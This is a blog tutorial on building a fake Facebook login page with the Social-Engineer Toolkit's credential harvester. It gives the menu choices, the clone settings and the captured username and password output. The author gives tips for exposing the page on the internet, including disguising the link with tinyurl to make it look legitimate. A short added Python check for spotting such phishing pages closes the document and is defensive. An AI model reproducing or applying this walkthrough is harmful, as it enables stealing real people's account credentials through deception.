Hacking Facebook
Social Engineering Toolkit
Humans are the weakest link in any security system ~Shashwat (That'll be me)
If you have read the previous post, then you know what I'm talking about. The Social-Engineer Toolkit does not exploit a vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking:
The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.
Kali Linux
I don't feel the need to mention it, but I'll still do it. You need Kali Linux to proceed with this tutorial. Check out the top of the page and see the "Kali Linux complete" tutorial.
Se-toolkit
Start Kali Linux. In a console/terminal type se-toolkit.
Something like this will show up
root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart
_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]
Explanation
- 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
- The 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
- Then, the 3 selects Credential Harvester. The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.
Now you'll be seeing something like this-
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Type 2 to select site cloner.
Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/
Now in your browser on Kali Linux, enter your IP. It will display the Facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMware or VirtualBox, then you can try entering the IP in the browsers there. It will work.
Entering the IP in the browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -
To make the technique work over the internet, you will need to use your public IP instead of the private one. Search Google for "what is my IP" to find your public IP, then use it. You can use tinyurl or something to make the URL appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. A firewall can also cause trouble. While this tutorial was nothing more than - se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvester on the internet will make the tutorial complete and useful in a practical sense.
Find your IP
In a new terminal, type ifconfig. This will give you your IPv4 address, which is what you are looking for.
Back to se-toolkit
Now it'll ask you to specify the IP to which the data is supposed to be sent. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake Facebook page will work only for computers connected to your LAN. Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.
Live demonstration
To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of Facebook, instead of the homepage. It will be a tad bit different. Here is a screenshot of what I did.
The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvester works.
On the Kali Linux Machine itself
Now if we enter something in the field, it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in username field and 'password' in password field. This is what se-toolkit shows-
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Also note that se-toolkit might keep dumping more stuff in the console, most of which is not important for the time being.
On Windows 8 machine (host)
Now I'm running Kali on a virtual machine. Windows 8 is the host machine, and we might want to check if it works on Windows 8. We would also like to see if modern browsers are able to observe anything wrong with the page, and if the firewall stops the data flow.
I entered windows8host and password2 and pressed the login button. This is what I got. Also, as I was logged in to Facebook with my personal account, the fake page redirected me to Facebook.
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2
Conclusion: This method works pretty well over LAN.
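Seen from the defending side, the page served in this demonstration has properties a mail gateway, proxy or browser extension can check: it arrives over plain HTTP from a bare IP address, and its password form posts back to that same IP while carrying Facebook branding. The check below is an added example, not part of the original tutorial or of SET; the BRAND_DOMAINS allowlist, the constructed sample HTML and all function names are assumptions.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BRAND_DOMAINS = {"facebook": ("facebook.com",)}  # assumption: brand -> trusted domains
# Constructed sample: a login form served from, and posting back to, a bare LAN IP.
SAMPLE_URL = "http://192.168.154.133/"
SAMPLE_HTML = ('<title>Log into Facebook</title><form action="http://192.168.154.133/">'
               '<input name="email"><input type="password" name="pass"></form>')

class LoginForms(HTMLParser):  # collects the action of each <form> holding a password input
    def __init__(self):
        super().__init__()
        self.actions, self._action = [], None
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._action = attrs.get("action") or ""
        elif (tag == "input" and (attrs.get("type") or "").lower() == "password"
              and self._action is not None):
            self.actions.append(self._action)
    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None

def is_ip(host):
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True

def assess_login_page(page_url, html):
    """Return sorted findings for a page; an empty list means nothing was flagged."""
    forms = LoginForms()
    forms.feed(html)
    page, findings = urlsplit(page_url), set()
    host = page.hostname or ""
    for action in forms.actions:
        target = urlsplit(urljoin(page_url, action))  # resolve relative actions
        if {page.scheme, target.scheme} != {"https"}:
            findings.add("password submitted without TLS")
        if is_ip(host) or is_ip(target.hostname or ""):
            findings.add("login form on or posting to a bare IP address")
        for brand, domains in BRAND_DOMAINS.items():
            trusted = any(host == d or host.endswith("." + d) for d in domains)
            if brand in html.lower() and not trusted:
                findings.add(f"{brand} branding on untrusted host {host}")
    return sorted(findings)
```

Calling assess_login_page(SAMPLE_URL, SAMPLE_HTML) returns all three findings, while the same form markup served from an HTTPS page on a facebook.com host returns none.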